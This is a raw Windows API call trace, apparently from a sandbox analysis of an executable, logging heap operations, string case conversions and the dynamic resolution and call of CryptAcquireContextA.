0x24b18f8 [0254.188] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa940 [0254.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0254.189] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0254.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0254.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0254.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0254.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0254.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0254.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.190] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0254.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0254.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0254.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0254.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0254.191] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0254.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0254.191] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0254.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0254.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0254.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0254.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0254.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0254.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0254.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0254.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0254.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0254.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0254.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0254.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0254.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0254.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0254.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0254.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0254.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0254.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0254.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0254.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0254.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0254.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0254.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0254.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.197] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0254.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0254.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0254.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0254.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0254.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0254.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0254.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0254.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0254.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0254.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0254.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0254.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0254.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0254.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0254.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0254.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0254.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466db0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0254.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0254.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.201] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0254.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0254.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0254.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0254.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466db0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0254.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0254.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.202] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0254.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0254.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3500 | out: hHeap=0x25c0000) returned 1 [0254.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0254.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0254.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.203] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0254.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0254.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0254.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0254.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0254.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0254.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0254.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0254.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0254.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0254.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0254.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0254.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0254.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0254.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0254.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0254.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0254.209] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0254.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0254.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0254.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0254.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0254.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0254.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0254.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0254.224] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0254.224] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0254.224] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0254.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0254.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0254.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0254.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0254.225] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0254.225] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.225] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0254.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0254.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0254.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0254.225] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.225] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.225] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.225] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0254.226] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0254.226] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0254.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0254.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0254.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0254.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0254.226] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0254.226] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.226] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0254.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0254.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0254.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0254.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0254.227] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.227] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0254.227] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0254.227] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0254.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.227] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0254.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0254.228] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb 